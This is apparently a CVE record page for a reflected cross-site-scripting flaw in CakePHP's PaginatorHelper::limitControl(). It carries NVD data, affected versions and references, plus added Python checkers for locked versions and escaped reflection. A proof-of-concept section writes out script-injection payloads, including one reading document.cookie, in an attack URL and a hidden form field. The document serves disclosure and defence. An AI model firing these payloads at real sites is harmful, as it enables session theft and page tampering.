Security Vulnerability Report
CVE-2026-23643 CVSS 5.4 MEDIUM

CVE-2026-23643

Published: 2026-01-16 21:15:52
Last Modified: 2026-02-23 20:51:11

Description

CakePHP is a rapid development framework for PHP. The PaginatorHelper::limitControl() method has a cross-site-scripting vulnerability via query string parameter manipulation. This issue has been fixed in 5.2.12 and 5.3.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:* (versionStartIncluding 5.2.10, versionEndExcluding 5.2.12) - VULNERABLE
cpe:2.3:a:cakephp:cakephp:5.3.0:*:*:*:*:*:*:* - VULNERABLE
CakePHP >= 5.2.10 and < 5.2.12 (fixed in 5.2.12)
CakePHP 5.3.0 (fixed in 5.3.1)

Note that the NVD configuration starts the affected range at 5.2.10; releases before 5.2.10 are not listed as vulnerable. Check the locked cakephp/cakephp version (composer.lock) rather than the constraint in composer.json.
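
Because the affected range is a narrow window (5.2.10 up to but excluding 5.2.12, plus exactly 5.3.0), a naive "< 5.3.1" check over-reports. The following is an added example (not from the NVD record or CakePHP): it transcribes the two range nodes from the configuration above and tests the version locked in a composer.lock file against them. The composer.lock fragment is constructed for the example; the `packages` / `packages-dev` layout and `name` / `version` keys are those Composer writes.

```python
"""Added example: is the installed cakephp/cakephp inside the NVD-listed
affected ranges for CVE-2026-23643? Not part of the NVD record or CakePHP."""
import json
import re

# Transcribed from the NVD configuration nodes: (start inclusive, end exclusive).
# The second entry is the single version 5.3.0 expressed as a half-open range.
AFFECTED_RANGES = [((5, 2, 10), (5, 2, 12)), ((5, 3, 0), (5, 3, 1))]

# Constructed composer.lock fragment (assumption for the example; real files have many more entries).
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "cakephp/cakephp", "version": "5.2.11"},
        {"name": "cakephp/chronos", "version": "3.1.0"},
    ],
    "packages-dev": [],
})


def parse_version(text):
    """Turn '5.2.11' or 'v5.2.11' into a comparable (major, minor, patch) tuple.
    Any suffix after the patch number (e.g. '-RC1') is ignored, which is an
    assumption of this example; a pre-release tag may then be mis-classified."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(version):
    """True when the version lies inside any affected range."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def installed_cakephp_version(composer_lock_text):
    """Return the locked cakephp/cakephp version, or None if it is not a dependency."""
    lock = json.loads(composer_lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "cakephp/cakephp":
            return pkg.get("version")
    return None


def check_composer_lock(composer_lock_text):
    """Return (version, affected); affected is False when CakePHP is absent."""
    version = installed_cakephp_version(composer_lock_text)
    return version, bool(version and is_affected(version))


if __name__ == "__main__":
    ver, hit = check_composer_lock(SAMPLE_COMPOSER_LOCK)
    print(f"cakephp/cakephp {ver}: {'AFFECTED' if hit else 'not affected'} by CVE-2026-23643")
```

Run it against the real file with `check_composer_lock(open("composer.lock").read())`. Since the CPE ranges apply to the framework package, a project that vendors CakePHP outside Composer needs the version read from `vendor/cakephp/cakephp/VERSION.txt` instead, which is left out here.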

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-23643 PoC - XSS in CakePHP PaginatorHelper::limitControl() -->
<!-- Attack URL: the victim's browser executes the injected JS when the page renders the limit control -->
<!-- URL: http://target-website.com/controller/action?limit=10"><script>alert(document.cookie)</script> -->

<!-- PoC HTML form that submits the malicious limit value.
     The victim has to follow the link or submit the form, which is the UI:R in the CVSS vector. -->
<form action="http://target-website.com/posts/index" method="GET">
  <!-- &quot; is required: a backslash does not escape a quote inside an HTML attribute,
       so value="10\"><script>..." would end the attribute at the backslash. -->
  <input type="hidden" name="limit" value="10&quot;><script>alert('XSS')</script>" />
  <button type="submit">View Page with Malicious Limit</button>
</form>

<!-- Schematic illustration of the vulnerable pattern. This is NOT the actual CakePHP source
     (the real limitControl() has a different signature and renders a form around a select);
     it only shows the bug class: a query-string value written into HTML without output encoding.
     See the patch commit in the references for the real change.
public function limitControl($limit = null, $maxLimit = null, $model = null)
{
    // Vulnerable: the query parameter reaches the HTML output unescaped
    $passedArgs = $this->request->getQuery('limit');
    return $passedArgs; // XSS here
}
-->
<!-- Suggested fix: apply output encoding before the value is written into HTML
$safeLimit = htmlspecialchars($passedArgs, ENT_QUOTES | ENT_HTML5, 'UTF-8');
return $safeLimit;
-->
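
Firing `alert()` payloads at a production site is noisy and proves little once a WAF is in the path. The following is an added example (not from the advisory or CakePHP): a non-destructive check that a page reflecting the `limit` query parameter encodes it before writing it into HTML. It injects a canary containing only the characters that matter for attribute and tag injection (`"`, `>`, `<`) and classifies how they come back. Fetching is left to whatever HTTP client you use; the classification runs offline, here against two response bodies that are constructed for the example and are not real CakePHP output. The `probe_url`, `reflection_status` and canary names are this example's own.

```python
"""Added example: probe URL construction and unescaped-reflection check for the
?limit= parameter. Not from the advisory or CakePHP; response bodies are constructed."""
import html
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Canary: a quote to close an attribute, '>' to close the tag, then a unique tag name
# that will not collide with anything already on the page.
CANARY = 'zz"><cve23643>'

# Matches any entity encoding of the three special characters (&quot; / &#34; / &#x22; etc.).
_ENCODED = re.compile(
    r'zz(&quot;|&#34;|&#x22;)(&gt;|&#62;|&#x3e;)(&lt;|&#60;|&#x3c;)cve23643', re.IGNORECASE)


def probe_url(base_url, param="limit"):
    """Add or replace ?limit=<canary> on base_url, keeping the other query parameters."""
    parts = urlsplit(base_url)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query.append((param, CANARY))
    return urlunsplit(parts._replace(query=urlencode(query)))


def reflection_status(body, canary=CANARY):
    """Classify the canary's reflection in an HTML body:
    'unescaped' - raw canary present: the quote and '>' reached the markup unencoded (XSS)
    'escaped'   - only an entity-encoded form present (htmlspecialchars / h() applied)
    'absent'    - not reflected at all (e.g. the value was rejected as non-numeric)"""
    if canary in body:
        return "unescaped"
    if _ENCODED.search(body):
        return "escaped"
    return "absent"


# Constructed response bodies (assumptions for the example, not real CakePHP markup).
VULNERABLE_BODY = (
    '<form method="get" action="/posts/index"><select name="limit">'
    '<option value="20">20</option>'
    '<option value="' + CANARY + '" selected="selected">' + CANARY + '</option>'
    '</select></form>'
)
PATCHED_BODY = (
    '<form method="get" action="/posts/index"><select name="limit">'
    '<option value="20">20</option>'
    '<option value="' + html.escape(CANARY, quote=True) + '" selected="selected">'
    + html.escape(CANARY, quote=True) + '</option>'
    '</select></form>'
)


if __name__ == "__main__":
    print("probe:", probe_url("https://app.example.test/posts/index?page=2"))
    for name, body in (("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        print(f"{name}: {reflection_status(body)}")
```

Treat `absent` as "not proven safe": the same helper may reflect the value in a different view, and a framework that rejects `limit` as non-numeric on one action may accept it elsewhere. Only `escaped` on every page that renders the control is the result you want after upgrading to 5.2.12 or 5.3.1.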

References

https://github.com/cakephp/cakephp/security/advisories/GHSA-qh8m-9qxx-53m5 (Vendor Advisory)
https://github.com/cakephp/cakephp/commit/c842e7f45d85696e6527d8991dd72f525ced955f (Patch)
https://github.com/cakephp/cakephp/issues/19172 (Issue Tracking)
https://bakery.cakephp.org/2026/01/14/cakephp_5212.html (Product, Release Notes)
https://github.com/cakephp/cakephp/releases/tag/5.2.12 (Product, Release Notes)
https://github.com/cakephp/cakephp/releases/tag/5.3.1 (Product, Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23643", "sourceIdentifier": "[email protected]", "published": "2026-01-16T21:15:51.543", "lastModified": "2026-02-23T20:51:11.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CakePHP is a rapid development framework for PHP. The PaginatorHelper::limitControl() method has a cross-site-scripting vulnerability via query string parameter manipulation. This issue has been fixed in 5.2.12 and 5.3.1."}, {"lang": "es", "value": "CakePHP es un framework de desarrollo rápido para PHP. El método PaginatorHelper::limitControl() tiene una vulnerabilidad de cross-site-scripting a través de la manipulación de parámetros de cadena de consulta. Este problema ha sido solucionado en 5.2.12 y 5.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.10", "versionEndExcluding": "5.2.12", "matchCriteriaId": "DACDDE3A-55B3-43F0-A030-07372FDEC42B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cakephp:cakephp:5.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "56DEA383-8A1A-47C5-B1B9-BB4FEF91024D"}]}]}], "references": [{"url": "https://bakery.cakephp.org/2026/01/14/cakephp_5212.html", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": 
"https://github.com/cakephp/cakephp/commit/c842e7f45d85696e6527d8991dd72f525ced955f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cakephp/cakephp/issues/19172", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/cakephp/cakephp/releases/tag/5.2.12", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cakephp/cakephp/releases/tag/5.3.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cakephp/cakephp/security/advisories/GHSA-qh8m-9qxx-53m5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}